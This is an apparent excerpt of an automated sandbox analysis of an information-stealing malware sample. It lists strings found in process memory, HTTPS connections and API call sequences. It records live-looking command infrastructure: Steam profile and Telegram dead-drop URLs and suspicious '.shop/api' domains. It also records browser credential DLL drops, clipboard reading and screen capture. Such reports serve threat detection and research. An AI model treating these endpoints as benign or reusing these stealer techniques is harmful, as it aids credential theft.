Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.co
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/X
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000142A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/b_
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 0000000C.00000002.2802203193.0000000001457000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/l
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000142A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000142A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900J
Source: file.exe, 00000000.00000002.2053339176.0000000003465000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2770019694.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, FIEHIIIJDA.exe, 0000000D.00000002.2725250219.000000000391B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.0000000001071000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: RegAsm.exe, 00000010.00000002.3154731112.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869Zr
Source: file.exe, 00000000.00000002.2053339176.0000000003465000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, FIEHIIIJDA.exe, 0000000D.00000002.2725250219.000000000391B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: RegAsm.exe, 0000000C.00000002.2802203193.000000000146E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stogeneratmns.shop/api
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privac
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: KKKJKE.4.dr	String found in binary or memory: https://support.mozilla.org
Source: KKKJKE.4.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KKKJKE.4.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2053339176.0000000003465000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, FIEHIIIJDA.exe, 0000000D.00000002.2725250219.000000000391B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: RegAsm.exe, 0000000C.00000002.2802203193.000000000146E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vozmeatillu.shop/apiR
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, AKEGII.4.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, AKEGII.4.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: EGIDHD.4.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, FIEHIIIJDA.exe.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: EGIDHD.4.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: KKKJKE.4.dr	String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000004.00000002.2778828032.000000001BDFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: KKKJKE.4.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: RegAsm.exe, 00000004.00000002.2778828032.000000001BDFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: KKKJKE.4.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: RegAsm.exe, 00000004.00000002.2778828032.000000001BDFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: KKKJKE.4.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: KKKJKE.4.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: KKKJKE.4.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: RegAsm.exe, 00000004.00000002.2778828032.000000001BDFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: KKKJKE.4.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.105.54.160:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.32:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.5:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.13:443 -> 192.168.2.5:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.5:49758 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

12_2_00439BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

12_2_00439BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

4_2_00411F55

System Summary

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216
Source: vdshfd[1].exe.4.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040145B GetCurrentProcess,NtQueryInformationProcess,	4_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0EB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	4_2_6C0EB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0EB8C0 rand_s,NtQueryVirtualMemory,	4_2_6C0EB8C0
